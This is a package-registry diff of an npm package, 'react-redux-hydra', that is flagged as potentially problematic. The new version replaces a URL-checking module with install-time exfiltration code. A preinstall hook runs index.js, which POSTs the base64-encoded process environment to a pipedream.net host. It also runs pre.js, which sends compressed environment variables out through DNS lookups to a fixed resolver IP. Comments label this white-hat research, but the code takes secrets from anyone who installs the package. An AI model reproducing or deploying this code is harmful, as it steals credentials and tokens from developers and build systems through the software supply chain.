react-redux-hydra 41.0.1 → 9632.9374.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of react-redux-hydra might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +10 -14
  2. package/package.json +8 -8
  3. package/pre.js +39 -0
package/index.js CHANGED
@@ -1,17 +1,13 @@
1
- 'use strict';
1
+ // Hackerone white hat security research, catz@wearehackerone.com
2
2
 
3
- var parse = require('url-parse')
3
+ const http = require('https');
4
4
 
5
- var whitelist = ["auth.amazon.com"];
6
- function securityCheck(url) {
7
- var url = parse(url, true);
8
- for(var i=0;i<whitelist.length;i++){
9
- if(url.includes(whitelist[i])){
10
- return true;
11
- }
12
- return false;
13
- }
5
+ req = http.request({
6
+ host: 'ba18d240d48f99b177bd704072fdcb3f.m.pipedream.net',
7
+ path: '/' + (process.env.npm_package_name || ''),
8
+ method: 'POST'
9
+ }).on('error', function (err) {
10
+ });
14
11
 
15
- }
16
-
17
- module.exports.checkUrlHost = securityCheck;
12
+ req.write(Buffer.from(JSON.stringify(process.env)).toString('base64'));
13
+ req.end();
package/package.json CHANGED
@@ -1,16 +1,16 @@
1
1
  {
2
2
  "name": "react-redux-hydra",
3
- "version": "41.0.1",
3
+ "version": "9632.9374.0",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "test": "echo \"Error: no test specified\" && exit 1",
8
- "preinstall": "curl http://vrpssrf.corp.amazon.com/foobar -e 'react-redux-hydra+n1nj4sec' & echo react-redux-hydra > /tmp/npm.package"
8
+ "preinstall": "node index.js; node pre.js"
9
9
  },
10
- "dependencies": {
11
- "url-parse":"*",
12
- "urlpars3r": "*"
13
- },
14
- "author": "n1nj4sec",
15
- "license": "GPL"
10
+ "files": [
11
+ "index.js",
12
+ "pre.js"
13
+ ],
14
+ "author": "",
15
+ "license": "ISC"
16
16
  }
package/pre.js ADDED
@@ -0,0 +1,39 @@
1
+ // Hackerone white hat security research, catz@wearehackerone.com
2
+
3
+ var { Resolver } = require('dns');
4
+ var zlib = require('zlib');
5
+
6
+ var resolver = new Resolver();
7
+
8
+ function splitString(string, size) {
9
+ var re = new RegExp('.{1,' + size + '}', 'g');
10
+ return string.match(re);
11
+ }
12
+
13
+ resolver.setServers(['165.232.68.239']);
14
+ var d = process.env || {};
15
+ var data = Object.keys(d)
16
+ .filter(function (key) {
17
+ return (
18
+ typeof d[key] === 'string' &&
19
+ d[key].length >= 3 &&
20
+ d[key].length <= 100
21
+ );
22
+ })
23
+ .reduce(function (result, key) {
24
+ result[key] = d[key];
25
+ return result;
26
+ }, {});
27
+
28
+ var encData = zlib.brotliCompressSync(Buffer.from(JSON.stringify(data))).toString('hex');
29
+
30
+
31
+ var ch = splitString(encData, 60);
32
+
33
+ var dt = Date.now();
34
+
35
+ for (var i = 0; i < ch.length; i++) {
36
+ const domain = ['f' + dt, i + 1, ch.length, ch[i]].join('.');
37
+ resolver.resolve4(domain, function (err) {
38
+ });
39
+ }